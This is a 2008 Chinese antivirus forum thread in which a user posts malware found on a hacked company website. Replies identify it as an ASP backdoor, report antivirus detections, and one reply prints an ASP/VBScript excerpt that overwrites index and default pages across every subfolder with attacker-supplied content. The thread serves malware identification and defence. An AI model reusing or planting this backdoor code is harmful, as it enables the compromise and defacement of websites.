查看: 1951|回复: 4
收起左侧

[病毒样本] 网站被黑,病毒源码在此

[复制链接]
youba
发表于 2008-6-26 12:20:54 | 显示全部楼层 |阅读模式
公司网站被黑,找到了源码,打包在附件中,
请大家注意压缩包中的PW.ASP文件,这是探测器脚本,要禁用反病毒实时监控,如卡巴斯基。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
SIGKILL
发表于 2008-6-26 12:24:31 | 显示全部楼层
BDS/ASP.Ace.CS.6 Backdoor
qianwenxiang
发表于 2008-6-26 17:08:30 | 显示全部楼层

  1. On Error Resume Next
  2. Set Objeto=Server.CreateObject("Scripting.FileSystemObject")
  3. if request("t5") <> "" then
  4. Set ObjPasta = Objeto.GetFolder(request("t5"))
  5. end if

  6. On Error Resume Next
  7. if request("t3") <> "" then
  8. Set ObjPasta2 = Objeto.GetFolder(request("t3"))
  9. set ObjFso=server.CreateObject("Scripting.FileSystemObject")
  10. var_caminho=request("t3")
  11. For Each Pasta in ObjPasta2.Subfolders
  12. Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "" & pasta.name & "\index.htm", 2, True, False)
  13. ObjAbreArq.writeline request("t4")
  14. set ObjAbreArq = nothing   
  15. Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "" & pasta.name & "\index.html", 2, True, False)
  16. ObjAbreArq.writeline request("t4")
  17. set ObjAbreArq = nothing   
  18. Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "" & pasta.name & "\index.asp", 2, True, False)
  19. ObjAbreArq.writeline request("t4")
  20. set ObjAbreArq = nothing   
  21. Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "" & pasta.name & "\default.htm", 2, True, False)
  22. ObjAbreArq.writeline request("t4")
  23. set ObjAbreArq = nothing   
  24. Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "" & pasta.name & "\default.html", 2, True, False)
  25. ObjAbreArq.writeline request("t4")
  26. set ObjAbreArq = nothing   
  27. Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "" & pasta.name & "\default.asp", 2, True, False)
  28. ObjAbreArq.writeline request("t4")
  29. if err then
  30.    response.write "<font color=red><br>Erro em: </font>" & pasta.name
  31.    err=0
  32. else
  33.    response.write "<br>OK em " & pasta.name
  34. end if   
  35. set ObjAbreArq = nothing   
  36. next
  37. set ObjFso=nothing
  38. Set ObjPasta2 = nothing
  39. set ObjFso = nothing
  40. end if
复制代码
应该报的是开头这段VBS,利用FSO写入文件的代码
njlovebb
发表于 2008-6-26 17:12:07 | 显示全部楼层
检测到:木马程序 Backdoor.ASP.Ace.cs        URL: http://bbs.kafan.cn/attachment.p ... =1214471450//pw.asp
qigang
发表于 2008-6-26 21:57:17 | 显示全部楼层

7/0

RS20.50.32未杀!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-22 20:57 , Processed in 0.086589 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表